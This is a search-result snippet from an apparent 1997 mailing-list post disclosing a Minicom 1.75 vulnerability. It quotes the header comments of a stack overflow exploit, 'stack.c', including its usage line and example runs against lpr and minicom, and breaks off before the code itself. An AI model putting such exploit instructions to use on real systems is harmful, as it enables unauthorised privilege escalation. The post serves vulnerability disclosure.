Displaying 1 result from an estimated 1 matches for "stack_offset".
1997 Feb 09
0
Minicom 1.75 Vulnerability
...ssions from
that is really too trivial to describe here.
---( quoting file "stack.c" )---
/* this stack overflow exploit code was written by jsn <jason@redline.ru> */
/* provided "as is" and without any warranty. Sun Feb 9 08:12:54 MSK 1997 */
/* usage: argv[0] their_stack_offset buffer_size target_program [params] */
/* generated string will be appended to the last of params. */
/* examples: stack -600 1303 /usr/bin/lpr "-J" */
/* stack -640 153 /usr/bin/minicom -t vt100 -d "" */
#include <stdlib.h>
#include <unistd...